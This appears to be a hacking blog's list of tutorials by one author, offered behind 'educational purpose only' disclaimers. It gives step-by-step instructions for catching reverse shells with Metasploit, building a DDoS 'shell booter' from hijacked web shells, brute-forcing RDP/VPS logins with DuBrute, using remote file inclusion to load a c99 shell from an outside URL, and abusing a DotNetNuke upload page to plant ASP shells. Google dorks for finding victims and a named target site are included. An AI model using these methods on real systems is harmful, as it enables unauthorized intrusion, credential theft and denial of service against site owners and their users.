Back Connecting With MetasPloit

Salam Friends

NOTE:- This tutorial is only for educational purpose.

Today i will show you how to back connect with MetasPloit , as i found it better then back connecting with netcat because some server are not connecting with NETCAT while connected with MetasPloit.

i have already forward my port for My Backtrack  & it is 3333 in my case.My local IP is 192.168.1.3.

NOTE: if you are on vpn then switch it OFF

Run MetasPloit & give following commands
>use exploit/multi/handler
>set lhost  192.168.1.3
>set lport 3333

Now time is to select payload .. here you have to check your server operation system
like i have linux x86_64 , so i will set this payload

>set payload linux/x64/shell/reverse_tcp

>exploit

Payload handler will b started in your metasploit .

now go to your server side & click connect back with port (3333) with your global Ip

after clicking on connect you will get reverse shell in Metasploit.

 Regards
Gujjar(pcp)

Read full post »

Making Shell Booter + source

NOTE :This Tutorial is for educational Purpose only .
Shell Booter source + How To Make Ur Own

Salam to all

to day am gonna show you guys how to make your own shell booter,

let me explain little what is shell booter , A shell booter uses a series of shell to send packets to some one's router & router cant handle these much packets & no longer allow you to access website for a while.

NOTE:- more shells you will add it will make booter more stronger.
Requirements...

Prodigy Source+Mass shell adder 
http://www.mediafire.com/download/2g5atps0t9pks7f/Prodigy%27s+Source+Mass+Shell+Adder+by+Natha.zip

Shell Checker
 http://www.mediafire.com/download/du52p5rlfdm5ura/ShellChecker.exe (this is optional to search & add shell in ur booter, u can do it manualy or any other method u like) 

How To Setup A ShellBooter
now come to real work ,for setting up a booter we should have a cpanel with mysql & phpmy admin 



Creating a MySQL Database

I am now going to walk you through on how to make a MySQL database, this
is required for the booter to function, as it saves the users, 
passwords, shells, and so on. In the following demonstration I will be 
using cPanel.
click on "Mysql Management" as shown in pic...

click on "creat a new database"
& then create a databae with ur own login detail .. remember we will need this login detail afterwards 

i created my database with the name of MADLEET 
once ur data base is there ....now u have to set all permissions + like in pic

make sure that u have made all permissions or privliges on "yes" like in pic ..

 

Setting Up PhpMyAdmin
now time to import ur sql settings to "PhpMyAdmin"
click on "PhpMyAdmin" in ur cpanel then clicl on ur database which u have created & select sql tab.

now open ur source file which i have provided u in link 
upload all source files to ur cpanel & select dbc.php & edit its login detail with ur database login detail like in pic 
http://postimg.org/image/ct3n5rbl5/
Extract source file u will find a file named "dbprepare.sql" open this file in notepad & copy its souce then paste this txt into ur PhpMyadmin sql box of ur data base..

now scrol down a little & enter the data base name of ur data base..as in pic


Now, we're up to the last part of setting up the booter, go to http://yoursite.com/source/register.php obviously replace yoursite, with your own domain, and register yourself a new account. Once completed go back 
to PhpMyAdmin, and go to the users table
& set user lavel 5 & approved 1 this will make u administrator


Complete! Now login to your booter at http://yoursite.com/source/ you've successfully setup your booter!
login page for ur booter will look like this

& after lohin ur Booter's controlpanel will look like this 

Getting Free Shells From Pastebin

Open ShellChecker.exe, the link I have provided above, that you downloaded before, and go to pastebin.com, or pastie.org. Or other pastebin sites that allow search.

In the search box type one of these in, open them until you get a big list.

Code:

/x32.php
/greenshell.php
/shell.php
/webdav/

Once you've found a list, go to the bottom, and copy it all, from the 
little box, and paste it into the first collum of your shell checker 

it will give u UDP & TCP shells ..
TCP are Post & UDP are GEt shells

Regards
GUJJAR(PCP) 

Read full post »

Back Connecting Without Port Forward

Note:tutorial is for educational purpose only.
salam 2 all
Gujjar(pcp) is here guyz..
today i gonna share a method with u guyz ... which is about backconnecting...
as i saw many friends wondering about how to port forward in their routers for backconnecting & rooting ,coz weevely suc**. :|
so i have to make this tutorial for that friend hope u will like it  ...
there is no need of port forward for backconnecting is ur router u can simply use an alternate way ...
thing u need ..
1 . shell site (a simple WSO shell on site)
2. net cat is ur system..
3. youshould be with ur orignal IP not any vpn ( condition ) 

lets start
open ur wso shell & click on Network or Connect lik eis pic


now here u can see 2 option first 1 is Bind port to /bin/sh 2nd is Back-connect ....
we will use 1st option 
Bind port to /bin/sh
in previous pic u can see there is 31337 port is default selected , now click go or enter like in pic ..



now on target server's Port is binded .. now move to next step ..
open ur cmd window & give path to netcat & give this command like is pic 



c:\netcat>nc [server's Ip here] port
like ...
c:\netcat>nc 76.86.3.242 31337

now press enter & voila :v
u have done 
Regrds

Read full post »

Port Forwarding (PTCL Routers Specialy)

Salam 2 all
In this tutorial i will show you how to forward your port ,for Gaming & other purposes :D
1 :First go to your router's setting with 192.168.1.1 with logins

2 :Then go to Advance setup then go to Nat & select PVC7

3 : After selecting PCV7 go to Virtual Server option

4 :Then select your desire port with your Operation system's local IP ...Put same port as start & end port .
NOTE: In some router there is option for UDP & TCP port  in this case save save port with UDP & TCP
Separatly. & save your settings.

5 :You have done :D
    you can use your port now but let me test it either it is open or not :D
NOTE: This tetsing is not  necessary.
For testing i have already open my vmware port running BackTrack 5 r 3 in it , so am gonna test with METASPLOIT :D
6 : Run metasploit in back track & give following commands
>use exploit/multi/handler
>set payload windows/meterpreter/reverse_tcp
set lport 3333
set lhost 192.168.1.3
>exploit
NOTE LPORT is 3333 & LHOST is 192.168.1.3 is my case put your details as you have.

7 : now go to yougetsignal.com & test your port with your global Ip

8: youcan see port is open & after testing port openng your metasploit will show like that

Regards
GUJJAR(PCP)

Read full post »

Install Kali Linux In VmWare

1. Download Kali LinuxISO
2. https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_workstation/10_0 ( i am using VMware workstation in tutorial , if you have virtualbox or vmplayer then its good installation process is pretty same in every virtual platform )

Installation Process 

1 : click on create new virtual machine

create new virtual machine

2 : choose ISO

choose ISO

3 : Select Guest Operating System

select guest operating system

4 : Set name and location 

5 : Set disk space ( 20 GB is good enough, minimum 12 GB to work smoother )

5 : Review the hardware configuration and start the virtual machine 

Select Graphical Install

6 :  Select Graphical Install go through normal language and timezone host-name selection etc
Set your “root” password and don’t forget it

set root password and don’t forget it

7 : Disk Partition  ( if you are installing freshly without any dual boot then simply use guided and use full virtual disk )

use full virtual disk

8: Select hard-drive and select all-in-one  ( for new users ) or if you don’t know just choose all in one 

use full virtual disk

9 :  click on finish partitioning and write changes to disk  , choose yes to write 

10 : wait until installer finish copying files setting system

11 :  set network mirror and set boot-loader ( very important )

12 : after installation restart and login with username ” root ” and password ( what you set at step 6 )

kali linux

Read full post »

RDP a.k.a VPS Cracking

NOTE: This tutorial is for educational perpose only .
salam 2 all
lets start how to crack RDP aka vps ....
All u need 2 Softwares called DuBrute and Vnc_scanner to hack VPS.
you can download these tools from given link or can download by searching on google easly''''
for VNC_Scanner http://www.mediafire.com/?dka5g2wurcjaugv
& for Dubrute http://www.mediafire.com/?l5l416b99bd748c

1) Download both the files from the above link.

2) Extract both the files anywhere in ur pc.

3) Open Vnc_scanner folder

4) Open the exe file called vnc_scanner_gui.exe

NOTE :> here is a point which is never explained on any forum i ever seen ....the point is that this Vnc Scaner never gives u Dialup list or country Ip list
i saw users always asking 4 this problem so will explain its solution here....
first of all
5) Select any Country.

6) Click on Get Dial List
if u will get country Ip list then u will lucky enough otherwise as i said that this feature will not work u can get any country's Ip by
going on this site & search IP range for any country

http://www.proxysecurity.com/ip-address-...y=RESERVED

see image http://postimage.org/image/6gw62kc57/

after getting ip list paste it in notpad & here u have to edit this list a bit ," -" is between ips are with extra sapce & vnc will not accept this list so replace " - " with "-" with simple - as explain in image

see iamge http://postimage.org/image/vlch3uvy7/

http://postimage.org/image/m64jueplz/

now paste that into vnc scaner's -i box & start scan as shown in snap
http://postimage.org/image/wclsahvov/

After that it will scan for VPS working ips as in figure
http://postimage.org/image/kl73r6fu7/

After Scan finished click on Start parser "this is an option in vnc_scanner as u can see in vnc scanner's pic.It will save good ips in new text file called IPs.txt in same folder where vnc_scanner placed .


Now u need to get the usernames and Passwords for Scanned ips.For that u have to use one of the hacking software called Dubrute.



1) Open Dubrute folder

2) Copy the IPs.txt file from vnc_scanner folder and paste in Dubrute folder

3) Open the DUBrute.exe as shown in snap...
http://postimage.org/image/hwf0m94h5/

4) Click on Generation as shown in snap...
http://postimage.org/image/nw541x1gv/

1st click on File ip then select the text file called IPs.txt which u have already in ur vnc_scanner folder..

2nd u need to put a txt file for user names ....
put some user name like
admin
root
user
etc
in notepad & save it then select this txt file.

3rd u need a password txt file also ....u can also put some common passes is a notepad & save it as password list then select this password list as in figure's 3rd option...

Now press Start in ur Dubrute.



Let it brute the combinations.When a working VPS which match IP , Username and Pass , it would be saved in Dubrute folder File called good.txt
http://postimage.org/image/m76gevah3/
In this Image shows that I found 3 VPS which is working.
after getting working vps open "Remote Desktop Conection" in ur pc & enter the ip then it will ask for user & pass enter login detail .......u will be redirected to remote pc .


thats all 1 more thing may b ur AV detect these 2 cracking files a virus so ignore it....

if u get any problem then feel free to contact me here in madleets or on FB https://www.facebook.com/mindfreakzzz

regards
gujjar haxor (pcp)

Read full post »

RFI (Remote File Inclusion) Website Hacking Tutorial

NOTE:* this tutorial is for educational purpose only .to get concept of RFi attack.


Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to:Code execution on the web serverCode execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS).Denial of Service (DoS)Data Theft/Manipulation
www.targetsite.com/index.php?page=www.google.com
www.targetsite.com/index.php?page=www.google.com
http://www.target.com/v2/index.php?page=http://www.google.com
http://www.target.com/v2/index.php?page=http://www.google.com
Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:
Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:
Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell ishttp://www.sh3ll.org/c99.txt?
Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell ishttp://www.sh3ll.org/c99.txt?
http://www.target.com/v2/index.php?page=http://www.sh3ll.org/c99.txt?
http://www.target.com/v2/index.php?page=http://www.sh3ll.org/c99.txt?
Regards

Lets Start 

1st Step : Find a Vunerable websites using Google Dork

some dork for searching a RFI Vuln website

“inurl:index.php?page=” its Most Popular Dork of RFI hacking

This will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command

see example of this website  http://www.cbspk.com

So the hacker url will become

If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack.

http://www.sh3ll.org/c99.zip

The hacker would first upload the shells to a webhosting site such as ripway.com,viralhosts.com,110mb.com or another free hosts etc.

Now here is how a hacker would execute the following command to gain access

Don't Forget To  add “?” after .txt at the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it

Read full post »

Portal Hacking (DNN) | Dot Net Nuke Website Hacking Tutorial

NOTE:This tutorial is for education purpose only , to understand DNN Attacks.
Salam: frnds,Another easy  method of website Hacking called "Portal Hacking (Dot Net Nuke)". 

Lets start 

Step 1 - open  Google.com

Step 2:Now enter any of these  dorks

:inurl:/tabid/36/language/en-US/Default.aspx

inurl:fcklinkgallery.aspx 

This dork will be be Find Automaticly Vulnerable sites Step 3: 
you will find many sites, Select Any one 

Step 4: 
For example take this site.
Example:

http://www.abc.com/Home/tabid/36/Lan...S/Default.aspx

Step 5: Now replace

/Home/tabid/36/Language/en-US/Default.aspx

with this

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Step 6:You will get a Link Gallary page.So far so good!

Step 7: Dont do anything for now,wait for the next step...

Step 8:Now replace the URL in the address bar with a Simple Script

javascript:__doPostBack('ctlURL$cmdUpload','')

Step 9:You will Find the Upload Option

Step 10:
Select RootStep 11:
Upload your shell ASp Download it here
After upload 
go for your shell www.yoursite.com/portals/0/yourshellname.asp;.jpg
Regrads

Read full post »